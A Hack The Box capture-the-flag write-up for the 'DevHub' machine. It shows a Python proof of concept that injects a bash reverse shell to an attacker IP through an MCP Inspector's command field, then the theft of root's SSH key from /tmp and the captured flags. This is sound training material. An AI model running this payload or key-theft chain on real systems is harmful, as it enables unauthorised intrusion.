Hack The Box

DevHub

HTBMediumLinuxWebCVERCEPrivEsc

Summary

DevHub is a Medium Linux machine hosting an internal development platform. An MCP Inspector instance on port 6274 parses server configurations insecurely, executing the command field and yielding a reverse shell as analyst. A world-readable /tmp/opsdump.json contains root's private SSH key, which is used to log in directly as root.

Machine Information

Name	Difficulty	OS	Platform
DevHub	Medium	Linux	Hack The Box

Attack Path

Nmap reveals SSH (22) and HTTP (80).
Web enumeration shows the DevHub platform with three services.
MCP Inspector is identified on port 6274.
The MCP protocol parser is vulnerable to code injection.
RCE provides a foothold as analyst.
/tmp/opsdump.json exposes root's private SSH key.
SSH as root with the recovered key.

Reconnaissance

Initial enumeration was performed with Nmap.

nmap -sC -sV -A -T4 10.129.1.108

Nmap Scan

Port	Service	Notes
22	SSH	OpenSSH 8.2p1 (Ubuntu)
80	HTTP	nginx 1.18.0, title "DevHub"

The host was added to /etc/hosts as devhub.htb.

Web Enumeration

http://devhub.htb presented the DevHub "Internal Development & Analytics Platform" with three services:

DevHub dashboard

MCP Inspector — active on port 6274 (MCP development/debugging tool)
Analytics Dashboard — internal only, localhost:8888 (Jupyter)
Code Repository — internal Git server, in maintenance mode

The MCP Inspector was the most promising vector.

Exploitation — MCP Protocol Parsing

The MCP Inspector (http://devhub.htb:6274) processes MCP server configurations via an HTTP POST. The parser executed the command field without sanitization, enabling code injection.

MCP Inspector

A malicious server configuration was sent to /mcp/add:

import requests

target = "http://devhub.htb:6274"
payload = {
    "name": "test",
    "command": "bash -c 'bash -i >& /dev/tcp/10.10.14.116/4444 0>&1'",
}

response = requests.post(f"{target}/mcp/add", json=payload)
print(response.text)

PoC execution

Initial Access

A listener received the reverse shell as analyst.

nc -vnlp 4444

Reverse shell

uid=1000(analyst) gid=1000(analyst) groups=1000(analyst),4(adm)

Privilege Escalation

Enumeration

Searching the filesystem revealed a sensitive file in /tmp:

find / -name "*opsdump*" 2>/dev/null
# /tmp/opsdump.json

The file contained root's private SSH key in plaintext.

SSH key extraction

python3 -c "import json; print(json.load(open('/tmp/opsdump.json'))['root_private_key'])" > /tmp/root_key
chmod 600 /tmp/root_key

SSH as root

The recovered key allowed a direct login as root.

ssh -i /tmp/root_key root@10.129.1.108

Root shell

uid=0(root) gid=0(root) groups=0(root)

Flags

User

cat /home/analyst/user.txt

193356...

Root

cat /root/root.txt

Root flag

436d1fdb2f62729c73654d23d0dc857c

Vulnerabilities Identified

MCP Protocol Parsing — Code Execution

The MCP Inspector executed the command field from a server configuration via subprocess without validation.

Impact: unauthenticated remote code execution as analyst.

Insecure Credential Storage

Root's private SSH key was stored in plaintext in the world-readable /tmp/opsdump.json.

Impact: direct privilege escalation to root.

Tools Used

Nmap
curl
Netcat
Python 3
SSH

Key Takeaways

Lesser-known protocols (like MCP) can ship parsers with critical injection bugs.
/tmp is a frequent credential dumping ground; always enumerate it after a foothold.
Internal DevOps tooling is often less hardened than user-facing applications.
Found SSH keys should be tested against all known users.